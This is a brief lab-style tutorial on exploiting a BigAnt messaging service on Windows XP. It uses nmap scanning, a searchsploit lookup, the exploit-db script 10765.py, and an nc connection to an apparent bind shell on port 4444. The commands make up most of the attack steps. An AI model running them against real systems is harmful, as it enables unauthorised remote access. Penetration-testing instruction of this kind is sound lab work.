./searchsploit <name of aplication> <OS> <remote/local>
Now, time to try "How to exploit windows xp" with steps from:
1. Information Gathering
==> Scan live host with nmap >> # nmap <network id/netmask># nmap 192.168.56.0/24
2. Service Enumeration
To know service which running on system, we can search with port opened. I use nmap to know open ports. # nmap -p <range port> <ip address>
# nmap -p 1-65535 192.168.56.101
Port 6660/tcp and 6661/tcp is open but i don't know what aplication running on system. Assumptions i know he use bigant aplication version 2.523. Vulnerability Assesment
Search any posibility of bigant vulnerability with searchsploit in exploitdb.
===>> # ./searchsploit bigant windows remote
4. Exploit
To see how to use command, open file 10765.py (with cat command or other) and execute this.==> # python 10765.py 192.168.56.101
==> # nc -vn 192.168.56.101 4444
==========================================================================
==========================================================================